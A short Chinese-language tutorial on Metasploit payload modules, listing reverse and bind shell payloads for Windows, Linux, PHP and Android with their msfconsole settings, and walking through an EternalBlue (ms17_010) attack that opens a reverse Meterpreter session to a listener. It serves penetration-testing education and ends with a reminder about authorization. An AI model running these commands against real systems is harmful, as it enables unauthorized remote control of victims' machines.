Metasploit框架的payloads
模块用于定义在成功利用漏洞后执行的代码。以下是一些常见的payloads
模块及其使用案例:
1. Windows Payloads
-
windows/meterpreter/reverse_tcp
:反向TCP Meterpreter会话。set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
-
windows/exec
:执行单个命令。set PAYLOAD windows/exec set CMD "calc.exe"
2. Linux Payloads
-
linux/x86/meterpreter/reverse_tcp
:反向TCP Meterpreter会话。set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
-
linux/x86/exec
:执行单个命令。set PAYLOAD linux/x86/exec set CMD "ls -la"
3. Web应用Payloads
-
php/meterpreter/reverse_tcp
:反向TCP Meterpreter会话。set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
-
php/exec
:执行单个PHP命令。set PAYLOAD php/exec set CMD "phpinfo();"
4. Android Payloads
-
android/meterpreter/reverse_tcp
:反向TCP Meterpreter会话。set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
-
android/shell/reverse_tcp
:反向TCP Shell会话。set PAYLOAD android/shell/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
5. 其他 Payloads
-
generic/shell_bind_tcp
:绑定TCP Shell会话。set PAYLOAD generic/shell_bind_tcp set RPORT 1234
-
generic/shell_reverse_tcp
:反向TCP Shell会话。set PAYLOAD generic/shell_reverse_tcp set LHOST 192.168.1.2 set LPORT 4444
使用案例
假设你想利用一个Windows漏洞来获取远程控制,你可以按照以下步骤操作:
-
选择合适的
exploit
模块:use exploit/windows/smb/ms17_010_eternalblue
-
设置目标IP:
set RHOSTS 192.168.1.1
-
选择合适的
payload
模块:set PAYLOAD windows/meterpreter/reverse_tcp
-
设置本地监听地址和端口:
set LHOST 192.168.1.2 set LPORT 4444
-
运行模块:
run
注意事项
- 使用这些模块时,请确保你有合法的权限和目的。
- 避免在未经授权的系统上进行测试,以免违反法律或政策。
通过这些模块和案例,你可以定义在成功利用漏洞后执行的代码,从而获取远程控制或执行特定任务。